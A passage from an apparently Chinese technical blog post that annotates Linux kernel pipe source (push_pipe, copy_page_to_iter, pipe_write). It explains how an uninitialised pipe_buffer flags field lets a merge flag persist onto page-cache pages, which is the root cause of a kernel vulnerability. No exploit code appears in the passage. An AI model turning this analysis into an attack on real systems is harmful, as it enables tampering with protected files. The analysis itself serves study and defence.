class="type">size_t</span> offset, <span class="type">size_t</span> bytes,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 获取待写入的 pipe 结构体</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe = i-&gt;pipe;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf;</span><br><span class="line">    <span class="comment">// 获取待写入的 pipe 结构体的一些信息，例如 head、tail等等 </span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_tail = pipe-&gt;tail;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i_head = i-&gt;head;</span><br><span class="line">    <span class="type">size_t</span> off;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 这里是在做一些 check</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(bytes &gt; i-&gt;count))</span><br><span class="line">        bytes = i-&gt;count;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!bytes))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">sanity</span>(i))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> </span><br><span class="line">    <span class="comment">// 获取待写入的相对偏移位置</span></span><br><span class="line">    off = i-&gt;iov_offset;</span><br><span class="line">    <span class="comment">// 获取待接收数据的 pipe buf</span></span><br><span class="line">    buf = &amp;pipe-&gt;bufs[i_head &amp; p_mask];</span><br><span class="line">    <span class="keyword">if</span> (off) &#123;</span><br><span class="line">        <span class="keyword">if</span> (offset == off &amp;&amp; buf-&gt;page == page) &#123;</span><br><span class="line">            <span class="comment">/* merge with the last one */</span></span><br><span class="line">            buf-&gt;len += bytes;</span><br><span class="line">            i-&gt;iov_offset += bytes;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line">        i_head++;</span><br><span class="line">        buf = &amp;pipe-&gt;bufs[i_head &amp; p_mask];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果待写入的管道已满，则直接返回</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">pipe_full</span>(i_head, p_tail, pipe-&gt;max_usage))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    buf-&gt;ops = &amp;page_cache_pipe_buf_ops;</span><br><span class="line">    <span class="comment">// 增加该页的 refcount</span></span><br><span class="line">    <span class="built_in">get_page</span>(page);</span><br><span class="line">    buf-&gt;page = page;   <span class="comment">// 直接引用已有的页</span></span><br><span class="line">    buf-&gt;offset = offset;</span><br><span class="line">    buf-&gt;len = bytes;</span><br><span class="line"></span><br><span class="line">    pipe-&gt;head = i_head + <span class="number">1</span>;</span><br><span class="line">    i-&gt;iov_offset = offset + bytes;</span><br><span class="line">    i-&gt;head = i_head;</span><br><span class="line">out:</span><br><span class="line">    i-&gt;count -= bytes;</span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>简单讲下其中的关键：对于 recv pipe buf 来说，当有新的 page 数据复制到 recv pipe buf 上时，<strong>recv pipe buf 将直接引用该页</strong>，并记录下当前复制的 offset、len 等等，以降低性能开销。如果每次复制的都是不同的页，那 recv pipe bufs 上存放的就是不同页的引用，其中每页的 offset 和 len 可能不会饱和。</p><p>注意：由于这里 pipe buf 是<strong>直接引用其他页</strong>，因此在 page_write 处<strong>必须确保新传来的数据不会写入这样的页面</strong>中，而这种保证就依赖于 MERGE 标志。</p><p>在这里我们可以看到一个有意思的事情：<strong>虽然 recv pipe buf 结构体上的众多字段都被重新赋值，但有一个字段却被遗漏了，那就是 flags 字段</strong>！</p><h3 id="4-copy-to-iter-相关">4. copy_to_iter 相关</h3><p>除了 pipe_read 调用 <code>copy_page_to_iter</code> 函数，进而调用到 <code>copy_page_to_iter</code> 函数来<strong>传递数据至 pipe</strong> 以外，<code>copy_to_iter</code> 函数也可以用于 pipe 的数据传递：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> __always_inline __must_check</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">copy_to_iter</span><span class="params">(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes, <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!<span class="built_in">check_copy_size</span>(addr, bytes, <span class="literal">true</span>)))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> _copy_to_iter(addr, bytes, i);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">size_t</span> _copy_to_iter(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes, <span class="keyword">struct</span> iov_iter *i)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *from = addr;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(<span class="built_in">iov_iter_is_pipe</span>(i))) <span class="comment">// pipe case</span></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">copy_pipe_to_iter</span>(addr, bytes, i);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">iter_is_iovec</span>(i))</span><br><span class="line">        <span class="built_in">might_fault</span>();</span><br><span class="line">    <span class="built_in">iterate_and_advance</span>(i, bytes, v,</span><br><span class="line">        <span class="built_in">copyout</span>(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),</span><br><span class="line">        <span class="built_in">memcpy_to_page</span>(v.bv_page, v.bv_offset,</span><br><span class="line">                   (from += v.bv_len) - v.bv_len, v.bv_len),</span><br><span class="line">        <span class="built_in">memcpy</span>(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>copy_to_iter 函数有很多个调用点，因此大概率存在某个调用点是通过 <code>copy_to_iter</code> 函数来向 pipe 中写入数据。这样一来控制流变可以通过 <code>copy_to_iter-&gt; _copy_to_iter -&gt; copy_pipe_to_iter</code> 来调用到真正执行数据拷贝的操作：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">size_t</span> <span class="title">copy_pipe_to_iter</span><span class="params">(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes,</span></span></span><br><span class="line"><span class="params"><span class="function">                <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 获取 pipe 结构体</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe = i-&gt;pipe;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i_head;</span><br><span class="line">    <span class="type">size_t</span> n, off;</span><br><span class="line">    <span class="comment">// 执行 check</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">sanity</span>(i))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*  从代码中可以推测该函数的功能：</span></span><br><span class="line"><span class="comment">        1. 获取可写入管道的大小（管道可能不够大）</span></span><br><span class="line"><span class="comment">        2. 准备待写入管道的一些 pipe_buf</span></span><br><span class="line"><span class="comment">        3. 获取当前管道的 head 位置</span></span><br><span class="line"><span class="comment">        4. 获取当前 pipe 可写页位置的相对偏移 off</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    <span class="comment">// n 为待写入数据字节大小</span></span><br><span class="line">    bytes = n = <span class="built_in">push_pipe</span>(i, bytes, &amp;i_head, &amp;off);</span><br><span class="line">    <span class="comment">// 如果没有数据需要写入，则直接返回。通常这个分支不大可能会触发。</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!n))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// 循环写入管道，直到待写入的数据全部写完。每写一次时，要么写完一整页，要么没写完一页就直接退出</span></span><br><span class="line">    <span class="keyword">do</span> &#123;</span><br><span class="line">        <span class="comment">// 获取单次可写入的大小</span></span><br><span class="line">        <span class="type">size_t</span> chunk = <span class="built_in">min_t</span>(<span class="type">size_t</span>, n, PAGE_SIZE - off);</span><br><span class="line">        <span class="built_in">memcpy_to_page</span>(pipe-&gt;bufs[i_head &amp; p_mask].page, off, addr, chunk);</span><br><span class="line">        i-&gt;head = i_head;</span><br><span class="line">        i-&gt;iov_offset = off + chunk;</span><br><span class="line">        n -= chunk;</span><br><span class="line">        addr += chunk;</span><br><span class="line">        off = <span class="number">0</span>;</span><br><span class="line">        i_head++;</span><br><span class="line">    &#125; <span class="keyword">while</span> (n);</span><br><span class="line">    <span class="comment">// 修改当前 iov_iter 待写入的大小</span></span><br><span class="line">    i-&gt;count -= bytes;</span><br><span class="line">    <span class="keyword">return</span> bytes;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>接下来我们再来看看函数 <code>push_pipe</code>，从上面的注解我们也可得知这个函数是比较重要的：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">size_t</span> <span class="title">push_pipe</span><span class="params">(<span class="keyword">struct</span> iov_iter *i, <span class="type">size_t</span> size,</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">int</span> *iter_headp, <span class="type">size_t</span> *offp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 获取接收数据的 pipe</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe = i-&gt;pipe;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_tail = pipe-&gt;tail;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> p_mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> iter_head;</span><br><span class="line">    <span class="type">size_t</span> off;</span><br><span class="line">    <span class="type">ssize_t</span> left;</span><br><span class="line">    <span class="comment">// 一些常规 check 暂且不表</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(size &gt; i-&gt;count))</span><br><span class="line">        size = i-&gt;count;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!size))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    left = size;</span><br><span class="line">    <span class="comment">/* data_start 获取 pipe 的 head &amp; 起始 offset。</span></span><br><span class="line"><span class="comment">       这个函数用于过滤 head 指向上一个未被分配的 pipe buf 或者 offset == PAGE_SIZE 的情况 */</span></span><br><span class="line">    <span class="built_in">data_start</span>(i, &amp;iter_head, &amp;off);</span><br><span class="line">    *iter_headp = iter_head;</span><br><span class="line">    *offp = off;</span><br><span class="line">    <span class="comment">// 如果当前是从某个页的中间位置开始写</span></span><br><span class="line">    <span class="keyword">if</span> (off) &#123;</span><br><span class="line">        <span class="comment">// 判断这剩余半页够不够写</span></span><br><span class="line">        left -= PAGE_SIZE - off;</span><br><span class="line">        <span class="comment">// 要是够写则直接返回</span></span><br><span class="line">        <span class="keyword">if</span> (left &lt;= <span class="number">0</span>) &#123;</span><br><span class="line">            pipe-&gt;bufs[iter_head &amp; p_mask].len += size;</span><br><span class="line">            <span class="keyword">return</span> size;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果不够写则先把该可写的半页，扩充为可写的整页</span></span><br><span class="line">        pipe-&gt;bufs[iter_head &amp; p_mask].len = PAGE_SIZE;</span><br><span class="line">        iter_head++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 到这里时，则循环扩充页</span></span><br><span class="line">    <span class="keyword">while</span> (!<span class="built_in">pipe_full</span>(iter_head, p_tail, pipe-&gt;max_usage)) &#123;</span><br><span class="line">        <span class="comment">// 循环获取 pipe_buffer，并初始化 pipe_buffer 结构体上的数据</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[iter_head &amp; p_mask];</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">page</span> *page = <span class="built_in">alloc_page</span>(GFP_USER);</span><br><span class="line">        <span class="keyword">if</span> (!page)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">        buf-&gt;ops = &amp;default_pipe_buf_ops;</span><br><span class="line">        buf-&gt;page = page;</span><br><span class="line">        buf-&gt;offset = <span class="number">0</span>;</span><br><span class="line">        buf-&gt;len = <span class="built_in">min_t</span>(<span class="type">ssize_t</span>, left, PAGE_SIZE);</span><br><span class="line">        left -= buf-&gt;len;</span><br><span class="line">        <span class="comment">/* !!! 需要注意的是，这里没有对 buf 的 flag 字段初始化！因此这里的 flag 字段将沿用旧的 pipe_buffer 的 flag*/</span></span><br><span class="line">        iter_head++;</span><br><span class="line">        pipe-&gt;head = iter_head;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (left == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> size;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> size - left;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>从 <code>push_pipe</code> 函数中我们可以看到，当 kernel 循环扩充 pipe_buffer 上的页时，这里也<strong>并没有初始化 pipe_buffer 的 flag 标志</strong>！又因为 pipe_buffer 在设计上便是一个环，因此在扩孔 pipe_buffer 时，这里也<strong>将重用先前 pipe_buffer 所设置的 flag</strong>。</p><blockquote><p>这里简单总结一下 copy_page_to_iter 函数与 copy_to_iter 函数在<strong>复制数据进 pipe 时</strong> 所实现的差异：</p><ul><li>前者是在一个完整 page 上，将数据复制给 pipe。因此 pipe buf 只需直接引用该页，并记录下 offset 和 len，即可完成复制操作。</li><li>后者不保证源数据在完整 page 上，而是提供了 addr 和 len，因此 pipe buf 需要自己准备存放数据的 page。</li></ul></blockquote><h3 id="5-pipe-write-函数">5. pipe_write 函数</h3><p>这次我们只关注最精华的两部分，首先是 <strong>页合并</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">head = pipe-&gt;head;</span><br><span class="line">was_empty = <span class="built_in">pipe_empty</span>(head, pipe-&gt;tail);</span><br><span class="line">chars = total_len &amp; (PAGE_SIZE<span class="number">-1</span>);</span><br><span class="line"><span class="keyword">if</span> (chars &amp;&amp; !was_empty) &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[(head - <span class="number">1</span>) &amp; mask];</span><br><span class="line">    <span class="type">int</span> offset = buf-&gt;offset + buf-&gt;len;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((buf-&gt;flags &amp; PIPE_BUF_FLAG_CAN_MERGE) &amp;&amp;</span><br><span class="line">        offset + chars &lt;= PAGE_SIZE) &#123;</span><br><span class="line">        ret = <span class="built_in">pipe_buf_confirm</span>(pipe, buf);</span><br><span class="line">        <span class="keyword">if</span> (ret)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line"></span><br><span class="line">        ret = <span class="built_in">copy_page_from_iter</span>(buf-&gt;page, offset, chars, from);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(ret &lt; chars)) &#123;</span><br><span class="line">            ret = -EFAULT;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        buf-&gt;len += ret;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">iov_iter_count</span>(from))</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果说当前 pipe buf 中已经存在数据，并且本次待写入的数据可以被该 pipe buf 剩余空间所容纳，则本次写入的数据将直接写入该 pipe buf 中，与先前的 pipe buf 数据合并。这个合并操作需要 pipe buf 有 <strong>PIPE_BUF_FLAG_CAN_MERGE</strong> 标志，该标志只要 pipe_write 所对应的 fd 没有设置 O_DIRECT 标志即可自动设置。</p><p>其次是正常的页面写入逻辑：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    <span class="comment">// 如果一个管道没有读者，则说明管道已经被破坏，生成 SIGPIPE 信号</span></span><br><span class="line">    <span class="keyword">if</span> (!pipe-&gt;readers) &#123;</span><br><span class="line">        <span class="built_in">send_sig</span>(SIGPIPE, current, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">if</span> (!ret)</span><br><span class="line">            ret = -EPIPE;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 尝试循环往管道内写入数据</span></span><br><span class="line">    head = pipe-&gt;head;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">pipe_full</span>(head, pipe-&gt;tail, pipe-&gt;max_usage)) &#123;</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">int</span> mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[head &amp; mask];</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">page</span> *page = pipe-&gt;tmp_page;</span><br><span class="line">        <span class="type">int</span> copied;</span><br><span class="line">        <span class="comment">// 获取先前被释放但是缓存起来的 tmp_page。</span></span><br><span class="line">        <span class="comment">// 如果存在 tmp_page 则在向 pipe buf 写入数据时就可直接重用而无需分配</span></span><br><span class="line">        <span class="keyword">if</span> (!page) &#123;</span><br><span class="line">            page = <span class="built_in">alloc_page</span>(GFP_HIGHUSER | __GFP_ACCOUNT);</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!page)) &#123;</span><br><span class="line">                ret = ret ? : -ENOMEM;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            pipe-&gt;tmp_page = page;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* Allocate a slot in the ring in advance and attach an</span></span><br><span class="line"><span class="comment">             * empty buffer.  If we fault or otherwise fail to use</span></span><br><span class="line"><span class="comment">             * it, either the reader will consume it or it&#x27;ll still</span></span><br><span class="line"><span class="comment">             * be there for the next write.</span></span><br><span class="line"><span class="comment">             */</span></span><br><span class="line">        <span class="built_in">spin_lock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line"></span><br><span class="line">        head = pipe-&gt;head;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pipe_full</span>(head, pipe-&gt;tail, pipe-&gt;max_usage)) &#123;</span><br><span class="line">            <span class="built_in">spin_unlock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        pipe-&gt;head = head + <span class="number">1</span>;</span><br><span class="line">        <span class="built_in">spin_unlock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* Insert it into the buffer array */</span></span><br><span class="line">        <span class="comment">// 往新的 pipe buf 中写入数据</span></span><br><span class="line">        buf = &amp;pipe-&gt;bufs[head &amp; mask];</span><br><span class="line">        buf-&gt;page = page;</span><br><span class="line">        buf-&gt;ops = &amp;anon_pipe_buf_ops; <span class="comment">// 设置匿名管道操作</span></span><br><span class="line">        buf-&gt;offset = <span class="number">0</span>;</span><br><span class="line">        buf-&gt;len = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// 如果 fd 设置了 O_DIRECT，则每次写入时都会占用新的一页，而不会合并</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">is_packetized</span>(filp)) </span><br><span class="line">            buf-&gt;flags = PIPE_BUF_FLAG_PACKET;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            buf-&gt;flags = PIPE_BUF_FLAG_CAN_MERGE;</span><br><span class="line">        pipe-&gt;tmp_page = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// 复制页数据</span></span><br><span class="line">        copied = <span class="built_in">copy_page_from_iter</span>(page, <span class="number">0</span>, PAGE_SIZE, from);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(copied &lt; PAGE_SIZE &amp;&amp; <span class="built_in">iov_iter_count</span>(from))) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!ret)</span><br><span class="line">                ret = -EFAULT;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        ret += copied;</span><br><span class="line">        buf-&gt;offset = <span class="number">0</span>;</span><br><span class="line">        buf-&gt;len = copied;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">iov_iter_count</span>(from))</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">pipe_full</span>(head, pipe-&gt;tail, pipe-&gt;max_usage))</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Wait for buffer space to become available. */</span></span><br><span class="line">    <span class="keyword">if</span> (filp-&gt;f_flags &amp; O_NONBLOCK) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!ret)</span><br><span class="line">            ret = -EAGAIN;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">signal_pending</span>(current)) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!ret)</span><br><span class="line">            ret = -ERESTARTSYS;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这个 tmp_page 简单讲一下。如果该 pipe buf 所持有的 page 只有它自己持有，并且现在打算将其释放，那么 pipe buf 就私下不释放该 page，而是将其缓存起来供后续使用：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">anon_pipe_buf_release</span><span class="params">(<span class="keyword">struct</span> pipe_inode_info *pipe,</span></span></span><br><span class="line"><span class="params"><span class="function">                  <span class="keyword">struct</span> pipe_buffer *buf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">page</span> *page = buf-&gt;page;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * If nobody else uses this page, and we don&#x27;t already have a</span></span><br><span class="line"><span class="comment">     * temporary page, let&#x27;s keep track of it as a one-deep</span></span><br><span class="line"><span class="comment">     * allocation cache. (Otherwise just release our reference to it)</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">page_count</span>(page) == <span class="number">1</span> &amp;&amp; !pipe-&gt;tmp_page)</span><br><span class="line">        pipe-&gt;tmp_page = page;</span><br><span 